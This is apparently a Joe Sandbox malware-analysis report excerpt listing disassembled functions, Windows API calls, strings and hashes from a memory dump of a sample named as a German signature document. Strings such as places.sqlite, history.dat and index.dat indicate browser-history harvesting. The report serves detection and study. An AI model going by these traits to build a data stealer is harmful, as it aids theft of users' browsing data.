                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                            • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                            • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                            • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                            Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                            • API String ID: 2221118986-1725073988
                                                            • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                            • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                            Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,00000000,00412966,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004125C3
                                                            • DeleteObject.GDI32(00000000), ref: 004125E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@DeleteObject
                                                            • String ID: r!A
                                                            • API String ID: 1103273653-628097481
                                                            • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                            • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                            • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                            • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                            Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                            • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                            • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                            • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                            Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$memcmp
                                                            • String ID: $$8
                                                            • API String ID: 2808797137-435121686
                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                            Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,75D52EE0), ref: 0040E3EC
                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                            • String ID:
                                                            • API String ID: 1979745280-0
                                                            • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                            • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                            Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                            • memset.MSVCRT ref: 00403A55
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                            • String ID: history.dat$places.sqlite
                                                            • API String ID: 2641622041-467022611
                                                            • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                            • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                            Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                            • GetLastError.KERNEL32 ref: 00417627
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$File$PointerRead
                                                            • String ID:
                                                            • API String ID: 839530781-0
                                                            • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                            • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                            Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FileFindFirst
                                                            • String ID: *.*$index.dat
                                                            • API String ID: 1974802433-2863569691
                                                            • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                            • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                            Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$FilePointer
                                                            • String ID:
                                                            • API String ID: 1156039329-0
                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                            Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                            Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                            • String ID:
                                                            • API String ID: 1125800050-0
                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                            Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                            • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleSleep
                                                            • String ID: }A
                                                            • API String ID: 252777609-2138825249
                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                            Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • malloc.MSVCRT ref: 00409A10
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                            • free.MSVCRT ref: 00409A31
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: freemallocmemcpy
                                                            • String ID:
                                                            • API String ID: 3056473165-0
                                                            • Opcode ID: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                            • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                            • Opcode Fuzzy Hash: 4a52a1335cfde8b1ca48f25083a26fca5b2b00b674d395485fb9b1b856b8e911
                                                            • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                            Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                            Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: BINARY
                                                            • API String ID: 2221118986-907554435
                                                            • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                            • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                            Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp
                                                            • String ID: /stext
                                                            • API String ID: 2081463915-3817206916
                                                            • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                            • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                            Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                              • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                            • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
